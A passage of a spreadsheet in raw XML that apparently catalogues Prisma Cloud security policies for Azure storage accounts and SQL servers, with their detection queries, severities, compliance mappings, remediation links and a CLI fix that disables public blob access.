https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-sql-servers-enables-data-security-policy</t>
        </is>
      </c>
      <c r="Y2440" t="inlineStr"/>
      <c r="Z2440" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-server-list' AND json.rule =  "$.serverSecurityAlertPolicy.properties.retentionDays does not exist or $.serverSecurityAlertPolicy.properties.state equals Disabled"
{"category":"General","resourceTypes":["azurerm_mssql_server_security_alert_policy","azurerm_sql_server"]}</t>
        </is>
      </c>
      <c r="AA2440" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2440" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2440" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-332-CKV2_AZURE_13</t>
        </is>
      </c>
      <c r="AD2440" t="b">
        <v>1</v>
      </c>
      <c r="AE2440" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2440" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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0" t="inlineStr">
        <is>
          <t>4169132e-ead6-4c01-b147-d2b47b443678</t>
        </is>
      </c>
      <c r="AI2440" t="inlineStr">
        <is>
          <t>d7d19f58-2868-47a1-9ed6-63bf8074770d</t>
        </is>
      </c>
      <c r="AJ2440" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2440" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2441">
      <c r="A2441" t="inlineStr"/>
      <c r="B2441" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2441" s="2" t="inlineStr"/>
      <c r="D2441" t="n">
        <v>2</v>
      </c>
      <c r="E2441" t="n">
        <v>59</v>
      </c>
      <c r="F2441" t="n">
        <v>0</v>
      </c>
      <c r="G2441" t="b">
        <v>1</v>
      </c>
      <c r="H24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41" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2441" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2441" t="inlineStr">
        <is>
          <t>mdavis1 Azure Storage account with shared access keys true</t>
        </is>
      </c>
      <c r="L2441" t="inlineStr"/>
      <c r="M2441" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2441" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2441" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2441" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2441" t="inlineStr"/>
      <c r="R2441" t="inlineStr"/>
      <c r="S2441" t="inlineStr"/>
      <c r="T2441" t="b">
        <v>0</v>
      </c>
      <c r="U2441" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2441" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2441" t="inlineStr"/>
      <c r="X2441" t="inlineStr"/>
      <c r="Y2441" t="inlineStr"/>
      <c r="Z2441" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' and api.name = 'azure-storage-account-list' and json.rule = properties.allowSharedKeyAccess is true</t>
        </is>
      </c>
      <c r="AA2441" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB2441" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2441" t="inlineStr"/>
      <c r="AD2441" t="b">
        <v>0</v>
      </c>
      <c r="AE2441" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2441" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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41" t="inlineStr">
        <is>
          <t>6f207f8d-9909-4f28-80e1-87f3994c427a</t>
        </is>
      </c>
      <c r="AI2441" t="inlineStr">
        <is>
          <t>76b03199-15d8-411c-ae80-a1f0928ec03c</t>
        </is>
      </c>
      <c r="AJ2441" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2441" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2442">
      <c r="A2442" t="inlineStr"/>
      <c r="B2442" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2442" s="2" t="inlineStr"/>
      <c r="D2442" t="inlineStr"/>
      <c r="E2442" t="inlineStr"/>
      <c r="F2442" t="inlineStr"/>
      <c r="G2442" t="b">
        <v>0</v>
      </c>
      <c r="H24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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2442" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2442" t="inlineStr">
        <is>
          <t>test-alvaro</t>
        </is>
      </c>
      <c r="L2442" t="inlineStr"/>
      <c r="M2442" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2442" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2442" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2442" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2442" t="inlineStr"/>
      <c r="R2442" t="inlineStr"/>
      <c r="S2442" t="inlineStr"/>
      <c r="T2442" t="b">
        <v>0</v>
      </c>
      <c r="U2442" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2442" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2442" t="inlineStr"/>
      <c r="X2442" t="inlineStr"/>
      <c r="Y2442" t="inlineStr"/>
      <c r="Z2442" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-storage-account-list' AND json.rule = properties.supportsHttpsTrafficOnly is true and properties.minimumTlsVersion does not equal TLS1_2</t>
        </is>
      </c>
      <c r="AA2442" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2442" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2442" t="inlineStr"/>
      <c r="AD2442" t="b">
        <v>0</v>
      </c>
      <c r="AE2442" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2442" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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2" t="inlineStr">
        <is>
          <t>ca7ea7f2-b1b3-4432-b4b8-3b046dba8ba4</t>
        </is>
      </c>
      <c r="AI2442" t="inlineStr">
        <is>
          <t>a4533f61-0ada-46f2-9419-801e0f574963</t>
        </is>
      </c>
      <c r="AJ2442" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2442" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2443">
      <c r="A2443" t="inlineStr"/>
      <c r="B2443" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2443" s="2" t="inlineStr"/>
      <c r="D2443" t="inlineStr"/>
      <c r="E2443" t="inlineStr"/>
      <c r="F2443" t="inlineStr"/>
      <c r="G2443" t="b">
        <v>1</v>
      </c>
      <c r="H24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43" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2443" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2443" t="inlineStr">
        <is>
          <t>Potential data exposure risk due to publicly exposed Azure Storage account encryption key not configured for key rotation and contains sensitive machine learning workspace data</t>
        </is>
      </c>
      <c r="L2443" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,DISCOVERY</t>
        </is>
      </c>
      <c r="M2443" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2443" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2443" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2443" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2443" t="inlineStr"/>
      <c r="R2443" t="inlineStr"/>
      <c r="S2443" t="inlineStr"/>
      <c r="T2443" t="b">
        <v>0</v>
      </c>
      <c r="U2443" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2443" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2443" t="inlineStr">
        <is>
          <t>This policy identifies potential data exposure risk due to publicly exposed Azure Storage account encryption key not configured for key rotation and contains sensitive machine learning workspace data.
Publicly exposed Azure Storage account holding sensitive machine learning workspace data encrypted by an encryption key that is not rotated regularly could lead to compromise when keys get exposed by any means. Key rotation will make sure keys are rotated at regular intervals so that the compromise surface can be reduced.
Immediate attention is required to restrict public exposure reported for the Storage account, configure the encryption key rotation and enforce stricter access methods for reported Storage account as it contains sensitive machine learning workspace business information.</t>
        </is>
      </c>
      <c r="X2443"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To configure Stroage account encryption key rotation; refer below URL:
https://learn.microsoft.com/en-us/azure/storage/common/customer-managed-keys-configure-existing-account?tabs=azure-portal#configure-encryption-for-automatic-updating-of-key-versions
NOTE: Azure Storage checks the key vault for a new key version only once daily. When you rotate a key, be sure to wait 24 hours before disabling the older version.
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly placed.</t>
        </is>
      </c>
      <c r="Y2443" t="inlineStr"/>
      <c r="Z2443" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-storage-account-list') and finding.name contains all ('Azure Storage Account storing Machine Learning workspace high business impact data is publicly accessible','Azure Storage account encryption key is not rotated regularly','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2443" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2443" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:41</t>
        </is>
      </c>
      <c r="AC2443" t="inlineStr"/>
      <c r="AD2443" t="b">
        <v>1</v>
      </c>
      <c r="AE2443" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2443" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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43" t="inlineStr">
        <is>
          <t>6a927d67-6440-4fcb-8ba8-932da164c1c8</t>
        </is>
      </c>
      <c r="AI2443" t="inlineStr">
        <is>
          <t>0d11bb87-24d8-475d-97bf-678ab5867bd8</t>
        </is>
      </c>
      <c r="AJ2443" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2443" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2444">
      <c r="A2444" t="inlineStr"/>
      <c r="B2444" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2444" s="2" t="inlineStr"/>
      <c r="D2444" t="inlineStr"/>
      <c r="E2444" t="inlineStr"/>
      <c r="F2444" t="inlineStr"/>
      <c r="G2444" t="b">
        <v>1</v>
      </c>
      <c r="H24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44" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2444" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2444" t="inlineStr">
        <is>
          <t>Potential data exfiltration risk due to abuse of SAS keys on a publicly exposed Azure Storage account configured with Shared key authorization and contains sensitive machine learning workspace data</t>
        </is>
      </c>
      <c r="L2444" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,DISCOVERY</t>
        </is>
      </c>
      <c r="M2444" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2444" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2444" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2444" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2444" t="inlineStr"/>
      <c r="R2444" t="inlineStr"/>
      <c r="S2444" t="inlineStr"/>
      <c r="T2444" t="b">
        <v>0</v>
      </c>
      <c r="U2444" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2444" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2444" t="inlineStr">
        <is>
          <t>This policy identifies potential data exfiltration risk due to abuse of SAS keys on a publicly exposed Azure Storage accounts configured with Shared key authorization and contains sensitive machine learning workspace data.
Azure Storage accounts authorized with Shared Key authorization via Shared Access Signature (SAS) tokens pose a security risk, as they allow sharing information with external unidentified identities. The combination of public access permissions and Shared key authorization with sensitive machine learning workspace data in the storage account increases the risk of unauthorized access and data exfiltration. Proper access control and data protection measures should be in place to prevent potential compromise of critical data.
Immediate attention is required to restrict public exposure reported for the Storage account as soon as possible, prevent use of Shared Key authorization and enforce stricter access methods for reported Storage account as it contains sensitive machine learning workspace business information.</t>
        </is>
      </c>
      <c r="X2444"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To prevent Shared Key authorization for an Azure Storage account, follow bellow URL:
https://learn.microsoft.com/en-us/azure/storage/common/shared-key-authorization-prevent
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly placed.</t>
        </is>
      </c>
      <c r="Y2444" t="inlineStr"/>
      <c r="Z2444" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-storage-account-list') and finding.name contains all ('Azure Storage Account storing Machine Learning workspace high business impact data is publicly accessible','Azure Storage account configured with Shared Key authorization','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2444" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2444" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:40</t>
        </is>
      </c>
      <c r="AC2444" t="inlineStr"/>
      <c r="AD2444" t="b">
        <v>1</v>
      </c>
      <c r="AE2444" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2444" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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44" t="inlineStr">
        <is>
          <t>42eb62ee-2164-492f-8bb5-4a7ba2b11508</t>
        </is>
      </c>
      <c r="AI2444" t="inlineStr">
        <is>
          <t>58fb53cb-d7f5-4881-a40d-aef05ce85da4</t>
        </is>
      </c>
      <c r="AJ2444" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2444" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2445">
      <c r="A2445" t="inlineStr">
        <is>
          <t>CIS v1.5.0 (Azure) - Level 1, CSA CCM v4.0.12, CIS v2.0.0 (Azure) Level 1, Microsoft Cloud Security Benchmark v1, CIS v2.1.0 (Azure) Level 1, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2445" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2445" s="2" t="inlineStr"/>
      <c r="D2445" t="inlineStr"/>
      <c r="E2445" t="inlineStr"/>
      <c r="F2445" t="inlineStr"/>
      <c r="G2445" t="b">
        <v>0</v>
      </c>
      <c r="H24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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2445" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2445" t="inlineStr">
        <is>
          <t>Azure Storage account is not configured with private endpoint connection</t>
        </is>
      </c>
      <c r="L2445" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2445" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2445" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2445" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2445" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2445" t="inlineStr">
        <is>
          <t>NS</t>
        </is>
      </c>
      <c r="R2445" t="inlineStr">
        <is>
          <t>NS-2</t>
        </is>
      </c>
      <c r="S2445" t="inlineStr"/>
      <c r="T2445" t="b">
        <v>0</v>
      </c>
      <c r="U2445" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2445" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2445" t="inlineStr">
        <is>
          <t>This policy identifies Storage accounts that are not configured with a private endpoint connection. Azure Storage account private endpoints can be configured using Azure Private Link. Private Link allows users to access an Azure Storage account from within the virtual network or from any peered virtual network. When Private Link is combined with restricted NSG policies, it helps reduce the risk of data exfiltration. It is recommended to configure Private Endpoint Connection to Storage account.</t>
        </is>
      </c>
      <c r="X2445" t="inlineStr">
        <is>
          <t>Refer following URL for configuring Private endpoints on your Storage account:
https://learn.microsoft.com/en-us/azure/private-link/create-private-endpoint-portal?#create-a-private-endpoint 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-33
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-33</t>
        </is>
      </c>
      <c r="Y2445" t="inlineStr"/>
      <c r="Z2445" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-storage-account-list' AND json.rule = properties.provisioningState equals Succeeded and networkRuleSet.defaultAction equal ignore case Allow and properties.privateEndpointConnections[*] is empty
{"category":"General","resourceTypes":["azurerm_storage_account"]}</t>
        </is>
      </c>
      <c r="AA2445" t="inlineStr">
        <is>
          <t>Oleg Kostine</t>
        </is>
      </c>
      <c r="AB2445" t="inlineStr">
        <is>
          <t>2024-11-13 23:46:00</t>
        </is>
      </c>
      <c r="AC2445" t="inlineStr">
        <is>
          <t>PC-AZR-STO-962-CKV2_AZURE_33</t>
        </is>
      </c>
      <c r="AD2445" t="b">
        <v>1</v>
      </c>
      <c r="AE2445" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2445" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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5" t="inlineStr">
        <is>
          <t>f32919fb-62a7-498a-83dd-e31e60ceda29</t>
        </is>
      </c>
      <c r="AI2445" t="inlineStr">
        <is>
          <t>7c773d6c-3225-4f0b-a020-661c48e414b4</t>
        </is>
      </c>
      <c r="AJ2445" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2445" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2446">
      <c r="A2446" t="inlineStr">
        <is>
          <t>HIPAA, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, CSA CCM v4.0.12, ISO/IEC 27001:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, SOC 2, Microsoft Cloud Security Benchmark v1, DORA, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, TX-RAMP Level 1, SOC 2, HIPAA, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2446" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2446" s="2" t="inlineStr"/>
      <c r="D2446" t="inlineStr"/>
      <c r="E2446" t="inlineStr"/>
      <c r="F2446" t="inlineStr"/>
      <c r="G2446" t="b">
        <v>1</v>
      </c>
      <c r="H24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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2446" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2446" t="inlineStr">
        <is>
          <t>Azure Storage account encryption key is not rotated regularly</t>
        </is>
      </c>
      <c r="L2446" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2446" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2446" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2446" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2446" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2446" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2446" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2446" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2446" t="b">
        <v>0</v>
      </c>
      <c r="U2446" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2446" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2446" t="inlineStr">
        <is>
          <t>This policy identifies Azure Storage accounts which are encrypted by an encryption key that is not rotated regularly. As a security best practice, it is important to rotate the keys periodically so that if the keys are compromised, the data in the underlying service is still secure with the new keys.</t>
        </is>
      </c>
      <c r="X2446" t="inlineStr">
        <is>
          <t>To configure Stroage account encryption key rotation; refer below URL:
https://learn.microsoft.com/en-us/azure/storage/common/customer-managed-keys-configure-existing-account?tabs=azure-portal#configure-encryption-for-automatic-updating-of-key-versions
NOTE: Azure Storage checks the key vault for a new key version only once daily. When you rotate a key, be sure to wait 24 hours before disabling the older version.</t>
        </is>
      </c>
      <c r="Y2446" t="inlineStr"/>
      <c r="Z2446" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-storage-account-list' AND json.rule = properties.encryption.keySource equal ignore case "Microsoft.Keyvault" as X; config from cloud.resource where api.name = 'azure-key-vault-list' and json.rule = keys[?any(attributes.exp equals -1 and attributes.enabled contains true)] exists as Y; filter '$.Y.properties.vaultUri contains $.X.properties.encryption.keyvaultproperties.keyvaulturi'; show X;</t>
        </is>
      </c>
      <c r="AA2446" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2446" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2446" t="inlineStr">
        <is>
          <t>PC-AZR-STO-1079</t>
        </is>
      </c>
      <c r="AD2446" t="b">
        <v>1</v>
      </c>
      <c r="AE2446" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2446" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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6" t="inlineStr">
        <is>
          <t>23ba4c25-0df9-410d-b933-cb8db9cbddc6</t>
        </is>
      </c>
      <c r="AI2446" t="inlineStr">
        <is>
          <t>33ab1ead-02fe-4161-9398-784d0454a41b</t>
        </is>
      </c>
      <c r="AJ2446" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2446" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2447">
      <c r="A2447" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Azure Security Benchmark (v2), RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, HITRUST v.9.4.2 [Deprecated], Matt's ATT&amp;ACK, CIS v1.1 (Azure), Microsoft Cloud Security Benchmark v1, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, CIS v2.0.0 (Azure) Level 1, ISO 27002:2022, Secure Controls Framework (SCF) - 2022.2.1, CIS v1.5.0 (Azure) - Level 1, MITRE ATT&amp;CK v12, ISO 27002:2022, CIS v1.4.0 (Azure), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev4, CSA CCM v4.0.12, HITRUST CSF v.11.2.0, CIS v1.2.0 (Azure), TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, CyberSecurity Law of the People's Republic of China, Azure Security Benchmark (v3), CIS v1.3.1 (Azure), Brazilian Data Protection Law (LGPD), PCI DSS v4.0, NIST SP 800-171 Revision 3, MITRE ATT&amp;CK v6.3 [Deprecated], MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, CIS Controls v8, Azure Security Benchmark (v2), CyberSecurity Law of the People's Republic of China, Azure Security Benchmark (v3), ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, CIS Controls v7.1, CyberSecurity Law of the People's Republic of China, Secure Controls Framework (SCF) - 2022.2.1, Australian Energy Sector Cyber Security Framework (AESCSF), CIS v2.1.0 (Azure) Level 1, HITRUST v.9.4.2 [Deprecated], PIPEDA, CIS v2.1.0 (Azure) Level 1, ISO 27002:2022, NIST SP 800-172, PCI DSS v3.2.1, CIS v1.3.0 (Azure), Fedramp (Low), MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CCPA 2018, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Azure Security Benchmark (v3), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Fedramp (Moderate), PCI DSS v3.2.1, NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B2447" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2447" s="2" t="inlineStr"/>
      <c r="D2447" t="n">
        <v>0</v>
      </c>
      <c r="E2447" t="n">
        <v>2</v>
      </c>
      <c r="F2447" t="n">
        <v>0</v>
      </c>
      <c r="G2447" t="b">
        <v>1</v>
      </c>
      <c r="H24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pcs-alert-rule, ranti-remediation test, splunk-test, tadenugba_Test_Rule, tadenugba_Test_Rule1, tag owner madavis1, test SI - XN, test-ebs, test-ebs-1, test-mms-may-15, test-yor-tushir, test1_alert_rules_20231006, testrule, testrule1, tushir-dell</t>
        </is>
      </c>
      <c r="I2447" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2447" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2447" t="inlineStr">
        <is>
          <t>Azure storage account has a blob container with public access</t>
        </is>
      </c>
      <c r="L2447" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2447" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2447" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2447" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2447" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2447" t="inlineStr">
        <is>
          <t>TA0009</t>
        </is>
      </c>
      <c r="R2447" t="inlineStr">
        <is>
          <t>T1530 - Data from Cloud Storage (TA0009)</t>
        </is>
      </c>
      <c r="S2447" t="inlineStr">
        <is>
          <t>Attack Path Rule,Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2447" t="b">
        <v>1</v>
      </c>
      <c r="U2447" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2447" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2447" t="inlineStr">
        <is>
          <t>This policy identifies blob containers within an Azure storage account that allow anonymous/public access ('CONTAINER' or 'BLOB'). As a best practice, do not allow anonymous/public access to blob containers unless you have a very good reason. Instead, you should consider using a shared access signature token for providing controlled and time-limited access to blob containers.
'Public access level' allows you to grant anonymous/public read access to a container and the blobs within Azure blob storage. By doing so, you can grant read-only access to these resources without sharing your account key, and without requiring a shared access signature.</t>
        </is>
      </c>
      <c r="X2447" t="inlineStr">
        <is>
          <t>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Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/azr-networking-190
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/azr-networking-190</t>
        </is>
      </c>
      <c r="Y2447" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Storage/storageAccounts/write' permission. Successful execution disables public access in Azure storage account,
this disables anonymous/public read access to a container and the blobs within Azure storage account",
'impact': 'Disables public access in Azure storage account',
'cliScriptTemplate': 'az resource update --ids $resourceId --set properties.allowBlobPublicAccess=false'</t>
        </is>
      </c>
      <c r="Z2447" t="inlineStr">
        <is>
